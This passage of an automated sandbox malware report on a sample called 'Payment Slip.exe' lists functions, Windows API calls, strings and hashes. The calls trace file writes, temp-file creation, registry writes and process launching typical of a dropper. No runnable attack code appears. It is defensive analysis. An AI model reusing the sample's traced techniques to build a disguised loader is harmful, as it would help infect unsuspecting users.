Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
Opcode Fuzzy Hash: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
WriteFile.KERNELBASE(00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,?,000000FF,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004030DC, 004030F3, 0040310F

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: File$PointerWrite
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 539440098-2559241417
Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

Function 00405B83 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405BA1
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC

Strings

nsa, xrefs: 00405B90
C:\Users\user\AppData\Local\Temp\, xrefs: 00405B88, 00405B8C

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-44229769
Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64

Function 0040232F Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
RegSetValueExW.KERNELBASE(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
Opcode Fuzzy Hash: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
Opcode Fuzzy Hash: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A

Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
CloseHandle.KERNEL32(?), ref: 00405695

Strings

Error launching installer, xrefs: 00405676

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79

Function 00403324 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment Slip.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Payment Slip.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206

CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00403345

Strings

1033, xrefs: 0040334C
C:\Users\user\AppData\Local\Temp\, xrefs: 00403325, 0040332A, 00403330, 0040333C, 00403344, 0040334B

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-2030658151
Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE

Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44

Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48

Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45

Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54

Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48

Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44

Function 00405BD7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

